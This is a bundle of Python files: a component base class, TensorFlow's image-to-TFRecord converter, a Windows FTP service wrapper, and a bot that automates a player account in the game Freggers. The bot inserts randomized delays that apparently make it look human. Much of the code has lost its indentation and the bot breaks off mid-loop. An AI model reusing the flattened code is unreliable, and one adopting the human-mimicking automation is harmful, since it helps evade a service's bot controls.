self.BC.loggingSettings(loggingLevel, loggingFile, loggingFormat)
def setSimulatedMode(self, simulate:bool, path:str):
""" Set if the capturing is simulated """
self.Simulating = simulate
self.SimulatingPath = path
self.log(Messages.comp_setSimulateMode.format(self.ME_NAME, str(simulate)), LogTypes.INFO)
@abc.abstractmethod
def start(self):
    """ Implement me! :: Do anything necessary to start the component. """
    raise NotImplementedError('Implement me! :: Do anything necessary to start the component.')
def stop(self):
    """ Stop the module and stop getting data """
self.Running = False
self.log(Messages.comp_stop.format(self.ME_NAME), LogTypes.WARNING)
def send(self, data:Data):
""" Send data to pool """
self.CP.send(data)
def receive(self, dataFilter:Data, limit:int=-1, lastTime:float=-1):
""" Returns a list objects type Data from pool """
if self.Simulating:
return self.simulateData(dataFilter, limit, lastTime)
else:
return self.CP.receive(dataFilter, limit=limit, lastTime=lastTime)
@abc.abstractmethod
def showData(self, data:Data):
    """ Implement me! :: Show data when this module starts standalone.
    Call init_standalone before start. """
    raise NotImplementedError('Implement me! :: Show data when this module starts standalone. Call init_standalone before start.')
@abc.abstractmethod
def simulateData(self, dataFilter:Data, limit:int=-1, lastTime:float=-1):
    """ Implement me! :: Simulate data when this module starts standalone.
    Call init_standalone before start. """
    raise NotImplementedError('Implement me! :: Simulate data when this module starts standalone. Call init_standalone before start.')
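# A minimal sketch of a hypothetical subclass, assuming only the hooks
# defined above; 'DummySensor' and its behaviour are illustrative and not
# part of the project.
class DummySensor(Component):
    def start(self):
        """ Push a single dummy Data object into the pool. """
        self.Running = True
        d = Data()
        d.source_type = self.ME_TYPE
        d.source_name = self.ME_NAME
        d.data = 'hello'
        self.send(d)

    def showData(self, data:Data):
        print('DummySensor data:', data.data)

    def simulateData(self, dataFilter:Data, limit:int=-1, lastTime:float=-1):
        return []  # no simulated source in this sketch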
|
build_image_data.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:  # binary mode: raw JPEG/PNG bytes
image_data = f.read()
# Convert any PNG to JPEG for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch index within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches of the form [ranges[i][0], ranges[i][1]).
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
    print('Finished finding files in %d of %d classes.' % (
        label_index, len(unique_labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
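# A minimal sketch (not used by this script) of how the records written
# above could be parsed back with the same TF 1.x API; the feature keys
# mirror _convert_to_example().
def _parse_example_sketch(serialized):
  """Decodes one serialized Example produced by this script."""
  features = tf.parse_single_example(serialized, features={
      'image/encoded': tf.FixedLenFeature([], tf.string),
      'image/class/label': tf.FixedLenFeature([], tf.int64),
      'image/class/text': tf.FixedLenFeature([], tf.string),
  })
  image = tf.image.decode_jpeg(features['image/encoded'], channels=3)
  return image, features['image/class/label'], features['image/class/text']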
|
eftepede_service.py | #! /usr/bin/python
import sys
import win32serviceutil
import win32service
import win32event
import threading
import os
import eftepede_server
import traceback
import _winreg
class eftepedeService(win32serviceutil.ServiceFramework):
_svc_name_ = "eftepede"
_svc_display_name_ = "eftepede! FTP Server"
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hStopSignal = win32event.CreateEvent(None, 0, 0, None)
def SvcStop(self):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
win32event.SetEvent(self.hStopSignal)
def SvcDoRun(self):
fh = open("C:\\temp\\eftepede-stderr.log","w")
sys.stderr = fh
sys.stdout = fh
try:
key = _winreg.OpenKey( _winreg.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\eftepede", _winreg.KEY_READ)
value, datatype = _winreg.QueryValueEx(key, "ImagePath")
directory = os.path.split(value)[0].replace('"','')
os.chdir(directory)
_winreg.CloseKey(key)
threading.Thread( target = eftepede_server.main ).start()
win32event.WaitForSingleObject(self.hStopSignal, win32event.INFINITE)
except:
traceback.print_exc( file = sys.stdout )
if __name__=='__main__':
win32serviceutil.HandleCommandLine(eftepedeService)
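# Usage note: pywin32's HandleCommandLine drives service management from
# the command line, e.g.
#   python eftepede_service.py install
#   python eftepede_service.py start
#   python eftepede_service.py stop
#   python eftepede_service.py remove
# The _winreg import marks this as Python 2 code; on Python 3 the module
# is named winreg.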
|
__init__.py | #Copyright (c) 2020 Jan Kiefer
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import random
import threading
import time
import math
import traceback
from datetime import datetime, date, timezone, timedelta
from .freggers import Freggers, Event
from .locale.de import LocaleDE
from .utils.item_search import ItemSearch
from .utils.item_pickup import ItemPickup
from .utils import format_time
from .iso import Status
TIMEZONE = timezone(timedelta(hours = 2))
def get_local_datetime():
return datetime.now(tz = TIMEZONE)
error_log = open('error.log', 'a')
def log_error(error):
traceback.print_exc()
traceback.print_exc(file = error_log)
error_log.flush()
class FreggersBot(Freggers):
CHAT_CHARS = {
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
'1', '2', '3', '4', '5', '6', '7', '8', '9', '0',
'Ä', 'Ö', 'Ü', 'ä', 'ö', 'ü', ',', ';', '.', '-', '_', '!', '?', '<', '>', ':', '#', '\'', '"', '+', '*', '|', '~', '\\',
'^', '°', '§', '$', '%', '&', '/', '(', ')', '=', '`', '´', ' '
}
PET_GUI_PREFIXES = {
'tp_botanik.suzy',
'tp_botanik.sparky',
'tp_botanik.claude',
'tp_botanik.fluffy',
'tp_botanik.betty',
'tp_botanik.pony',
'tp_botanik.santos',
'tp_botanik.gwen',
'tp_botanik.oskar',
'tp_botanik.ida',
'tp_botanik.nepo',
'tp_botanik.nyoko',
'tp_botanik.marvin'
}
AP_APARTMENT = 'plattenbau.eigenheim'
AP_HOOVER_STREET = 'hood.playrent'
AP_COCONUT_ISLAND = 'beach.inselrent'
AP_WEIDE = 'tp_botanik.weiderent'
MIN_ROOM_LOAD_DELAY = 0.2
MAX_ROOM_LOAD_DELAY = 4
MIN_SEARCH_DONE_DELAY = 0.2
MAX_SEARCH_DONE_DELAY = 8
def __init__(self, username, password, localeItems = LocaleDE, is_debug = False):
self.username = username
self.password = password
self.localeItems = localeItems
self.level_data = None
self.balance_data = None
self.start_level_data = None
self.room_waits = {}
self.speed_factor = 0.3 + random.random()
self.__fregger_check = None
self.__ants_times = {}
self.__church_visited_today = False
self.__e_room_ready = threading.Event()
self.__e_room_loaded = threading.Event()
self.__e_show_metromap = threading.Event()
self.__e_level_data = threading.Event()
self.__e_balance_data = threading.Event()
self.__e_success_cb = threading.Event()
self.__e_timer_bar = threading.Event()
self.__e_collect = threading.Event()
self.__e_quest_done = threading.Event()
self.timer_bar = None
self.quest = None
self.trash_items = {
localeItems.BEER_CRATE,
localeItems.FISH_BONE,
localeItems.DUNG_BEATLE,
localeItems.ACORN
}
self.trash_items.update(localeItems.EXPLORER_BADGE_ITEMS_0)
self.trash_items.update(localeItems.EXPLORER_BADGE_ITEMS_1)
self.trash_items.update(localeItems.EXPLORER_BADGE_ITEMS_2)
self.trash_items.update(localeItems.EXPLORER_BADGE_ITEMS_3)
self.prefered_store_items = {
localeItems.GNOME
}
self.consumable_items = {
localeItems.DRAGON_FLOWER,
localeItems.HORSE_FLOWER,
localeItems.DRAGON_TORCH,
localeItems.HORSESHOE,
localeItems.MUSIC_BOX,
localeItems.BLANKET,
localeItems.EMPTY_BOTTLE
}
self.disposable_consuamables = {
localeItems.DRAGON_MILK,
localeItems.DRAGON_MIXED_MILK,
localeItems.HORSE_MILK,
localeItems.HORSE_MIXED_MILK,
localeItems.CHILI,
localeItems.STRAWBERRY
}
self.disposable_consuamables.update(localeItems.LAZY_ANTS)
self.disposable_consuamables.update(localeItems.MUSHROOMS)
self.consumable_items.update(self.disposable_consuamables)
self.start = lambda: None
super(FreggersBot, self).__init__(log_prefix = '[' + self.username + ']', is_debug = is_debug, localeItems = localeItems)
self.register_callback(Event.CTXT_ROOM, self.__handle_room_ctxt)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, self.__handle_show_action)
self.register_callback(Event.ACTION_SHOW_METROMAP, self.__handle_show_metromap)
self.register_callback(Event.NOTIFY_LEVEL, self.__handle_level)
self.register_callback(Event.ENV_ITEM, self.__handle_env_item)
self.register_callback(Event.SHOW_TIMER_BAR, self.__handle_timer_bar)
self.register_callback(Event.OPEN_QUEST_VIEW, self.__handle_open_quest_view)
self.register_callback(Event.OPEN_QUEST_COMPLETED_VIEW, self.__handle_quest_completed)
self.register_callback(Event.NOTIFY_CREDIT_ACCOUNT, self.__handle_credit_account)
@staticmethod
def replace_non_chat_chars(str, replacement):
chat_chars = FreggersBot.CHAT_CHARS
for i, c in enumerate(str):
if c not in chat_chars:
str = str[:i] + replacement + str[i + 1:]
return str
def init(self):
self.log('Logging in...')
if self.init_session(self.username, self.password):
self.log('Logged in')
return True
else:
self.log('Could not login')
return False
def boot(self):
super(FreggersBot, self).boot()
self.__e_room_ready.wait()
self.send_show_metroplan()
self.__e_show_metromap.wait()
def __handle_credit_account(self, data):
self.balance_data = data
self.__e_balance_data.set()
def wait_balance_data(self):
self.__e_balance_data.wait()
def __handle_open_quest_view(self, data):
self.quest = data
def __handle_quest_completed(self, data):
self.quest = data['next_quest_label']
self.__e_quest_done.set()
def __handle_timer_bar(self, data):
self.timer_bar = data / 1000
self.__e_timer_bar.set()
def __handle_room_ctxt(self, room):
self.debug('Handle CTXT_ROOM:',room.room_context_label,room.gui(),room.room_gui,self.area_name,room.wob_id,
room.desc,room.topic,room.user_owns_room,room.owner_user_id,room.owner_user_name)
self.__e_room_loaded.clear()
self.__e_level_data.clear()
self.__e_room_ready.set()
room_waits = self.room_waits.get(room.room_context_label)
if room_waits != None:
request_metroplan = False
for room_wait in list(room_waits):
owner_id = room_wait['owner_id']
if owner_id == None or owner_id == room.owner_user_id:
if room_wait['area_index'] != None:
request_metroplan = True
else:
room_wait['success'] = True
room_wait['e'].set()
if request_metroplan:
self.send_show_metroplan()
def __handle_show_action(self, data):
if data == self.localeItems.NO_RIGHTS_TO_ENTER_ROOM or data == self.localeItems.ROOM_FULL:
for room_waits in self.room_waits.values():
for room_wait in list(room_waits):
room_wait['success'] = False
room_wait['e'].set()
def __handle_env_item(self, data):
self.debug('Handle ENV_ITEM:', data)
threading.Thread(target = self.__delayed_room_load_notify).start()
def wait_random_delay(self, min, max):
delay = min + (random.random() * (max - min)) * self.speed_factor
if delay > 0:
self.log('Waiting random delay of {} seconds.'.format(delay))
time.sleep(delay)
def __delayed_room_load_notify(self):
self.wait_random_delay(FreggersBot.MIN_ROOM_LOAD_DELAY, FreggersBot.MAX_ROOM_LOAD_DELAY)
self.__e_room_loaded.set()
def __handle_show_metromap(self, metromap_data):
self.debug('Metromap:', metromap_data)
self.__metromap = metromap_data
current_area_index = metromap_data[0]['label']
c_pos = current_area_index.find('%')
self.area_index = 0 if c_pos == -1 else int(current_area_index[c_pos + 1:c_pos + 2])
self.__e_show_metromap.set()
room_waits = self.room_waits.get(self.room.room_context_label)
if room_waits != None:
for room_wait in list(room_waits):
owner_id = room_wait['owner_id']
area_index = room_wait['area_index']
if (owner_id == None or owner_id == self.room.owner_user_id) and (area_index == None or area_index == self.area_index):
room_wait['success'] = True
room_wait['e'].set()
class WaitForEvent:
def __init__(self, freggers, event):
self.__freggers = freggers
self.event_type = event
self.event = threading.Event()
freggers.register_callback(event, self.__cb)
def __cb(self, data):
self.event.set()
def wait(self):
self.event.wait()
def clear(self):
self.event.clear()
def wait_once(self):
self.wait()
self.cleanup()
def cleanup(self):
self.__freggers.unregister_callback(self.event_type, self.__cb)
def get_wait_for_event(self, event):
return FreggersBot.WaitForEvent(self, event)
def wait_for_event(self, event):
e = threading.Event()
cb = lambda data: e.set()
self.register_callback(event, cb)
e.wait()
self.unregister_callback(event, cb)
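# Usage sketch for the wait helpers above (illustrative; 'bot' stands for
# a FreggersBot instance):
#   waiter = bot.get_wait_for_event(Event.CTXT_ROOM)
#   ...do something that changes the room...
#   waiter.wait_once()
# wait_for_event() does the same for a single wait, registering and
# unregistering the callback itself.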
def go_to_room(self, room_gui, exact):
plain_room_gui = room_gui
c_pos = plain_room_gui.find('%')
area_index = 0
if c_pos != -1:
c_end = plain_room_gui.index('.', c_pos)
area_index = int(plain_room_gui[c_pos + 1:c_end])
plain_room_gui = plain_room_gui[:c_pos] + plain_room_gui[c_end:]
c_pos = plain_room_gui.find('#@#')
owner_id = None
if c_pos != -1:
owner_id = int(plain_room_gui[c_pos + 3:])
plain_room_gui = plain_room_gui[:c_pos]
if exact:
self.__e_show_metromap.clear()
self.send_show_metroplan()
self.__e_show_metromap.wait()
if (self.room.room_context_label != plain_room_gui or (owner_id != None and self.room.owner_user_id != owner_id) or
(exact and area_index != self.area_index and owner_id == None)):
self.log('Going to room {} exact={} ...'.format(room_gui, exact))
wait = {
'e': threading.Event(),
'area_index': area_index if exact else None,
'owner_id': owner_id,
'success': False
}
waits = self.room_waits.get(plain_room_gui)
if waits == None:
waits = []
self.room_waits[plain_room_gui] = waits
waits.append(wait)
self.send_auto_walk_to(room_gui, False, exact)
wait['e'].wait()
waits.remove(wait)
self.log('Arrived in room {} success={}'.format(room_gui, wait['success']))
return wait['success']
return True
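# Use every effect item in the inventory on the player (or on position [1, 1, 1] while the player is unknown) to free the slots they occupy. Returns (slots freed, effects used).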
def throw_away_effects(self, inv = None):
self.log('Throwing away effects...')
if inv == None:
inv = self.ajax_request_inventory()
effect_names = self.localeItems.EFFECTS
target = [1, 1, 1] if self.player == None else self.player.wob_id
thrown = 0
slots_thrown = 0
for item in list(inv):
if item != None and item['description'] in effect_names:
for _ in range(item['count']):
self.ajax_item_usewith(item['id'], target)
thrown += 1
time.sleep(0.4)
slots_thrown += 1
inv.remove(item)
self.log('Threw {} effect(s) from {} slot(s).'.format(thrown, slots_thrown))
return (slots_thrown, thrown)
def get_target_pos(self, wob_id):
obj = self.wob_registry.get_object_by_wobid(wob_id)
if obj != None:
anim = self.animation_manager.get_animation(obj.iso_obj)
if anim != None:
return anim.get_target_pos()
return obj.iso_obj.get_uvz()
return None
def delete_item(self, item):
self.log('Deleting item \'{}\' count={} id={} ...'.format(item['description'], item['count'], item['id']))
return self.ajax_delete_item(item['id'])
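# Delete items listed in self.trash_items from the inventory and decline them from the item queue. Returns (inventory deletions, queue declines).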
def delete_trash_items(self, inv = None, queue = None):
if inv == None:
inv = self.ajax_request_inventory()
if queue == None:
queue = self.ajax_request_item_queue()
count_inv = 0
for item in list(inv):
if item != None and item['description'] in self.trash_items:
self.delete_item(item)
inv.remove(item)
count_inv += 1
count_queue = 0
for item in list(queue):
if item['description'] in self.trash_items:
self.ajax_inbox_action(item['id'], Freggers.INBOX_ACTION_DECLINE)
queue.remove(item)
count_queue += 1
return (count_inv, count_queue)
@staticmethod
def count_empty_slots(container):
count = 0
for item in container:
if item == None:
count += 1
return count
@staticmethod
def filter_items(container, item_names):
return list(filter(lambda item: item != None and item['description'] in item_names, container))
@staticmethod
def filter_item(container, item_name):
return list(filter(lambda item: item != None and item['description'] == item_name, container))
@staticmethod
def count_items(container, item_names):
count = 0
for item in container:
if item != None and item['description'] in item_names:
count += 1
return count
@staticmethod
def count_item(container, item_name):
count = 0
for item in container:
if item != None and item['description'] == item_name:
count += 1
return count
def get_item_count(self, item_name):
count = 0
inv = self.ajax_request_inventory()
for item in inv:
if item != None and item['description'] == item_name:
count += 1
queue = self.ajax_request_item_queue()
for item in queue:
if item['description'] == item_name:
count += 1
return count
def get_items_count(self, item_names):
count = 0
inv = self.ajax_request_inventory()
for item in inv:
if item != None and item['description'] in item_names:
count += 1
queue = self.ajax_request_item_queue()
for item in queue:
if item['description'] in item_names:
count += 1
return count
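# Shared callbacks for the collect_* loops: count created items, remember when the last timer bar was shown, and parse 'wait N seconds/minutes' feedback into __collect_remaining_wait.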
def __collect_handle_create_item(self, data):
self.__collect_remaining_wait = 0
self.__collect_amount += 1
self.__e_collect.set()
def __collect_handle_timer_bar(self, duration):
self.__collect_time = time.time()
def __collect_handle_action_feedback(self, txt):
if txt.endswith(self.localeItems.USE_WAIT_SUFFIX):
unit = 1 if self.localeItems.SECONDS in txt else 60
value = [int(s) for s in txt.split() if s.isdigit()][0]
self.__collect_remaining_wait = value * unit
else:
self.__collect_remaining_wait = 0
self.__e_collect.set()
def __init_collect(self):
self.__collect_amount = 0
self.__collect_remaining_wait = 0
self.register_callback(Event.NOTIFY_CREATE_ITEM, self.__collect_handle_create_item)
self.register_callback(Event.SHOW_TIMER_BAR, self.__collect_handle_timer_bar)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, self.__collect_handle_action_feedback)
def __deinit_collect(self):
self.unregister_callback(Event.NOTIFY_CREATE_ITEM, self.__collect_handle_create_item)
self.unregister_callback(Event.SHOW_TIMER_BAR, self.__collect_handle_timer_bar)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, self.__collect_handle_action_feedback)
self.__collect_amount = None
self.__collect_remaining_wait = None
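# Rotate through three areas of trash-container rooms, triggering SEARCH on each matching container until max_amount empty bottles are held (max_amount=0 keeps collecting forever).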
def collect_bottles(self, max_amount = 0):
self.__init_collect()
room_guis = [{'plattenbau.metro': 'wutzlhofen.schach_parkabfalleimer',
'plattenbau.bolzplatz': 'hood.strasse_muelltonne'},
{'hood.strasse': 'hood.strasse_muelltonne',
'hood.waschsalon': 'hood.waschsalon_plastikmuelleimer'},
{'wutzlhofen.uferpromenade': 'wutzlhofen.uferpromenade_abfalleimerblau',
'wutzlhofen.schach': 'wutzlhofen.schach_parkabfalleimer',
'wutzlhofen.passage': 'wutzlhofen.passage_muelleimer'}]
len_areas = len(room_guis)
area_index = random.randint(0, len_areas - 1)
collected_bottles = 0
while True:
self.log('[Bottles] Collecting {} / {}...'.format(collected_bottles, max_amount))
rooms = room_guis[area_index]
area_index = (area_index + 1) % len_areas
for room_label in rooms.keys() if random.random() > 0.5 else reversed(list(rooms.keys())):
gui = rooms[room_label]
self.go_to_room(room_label, False)
self.__e_room_loaded.wait()
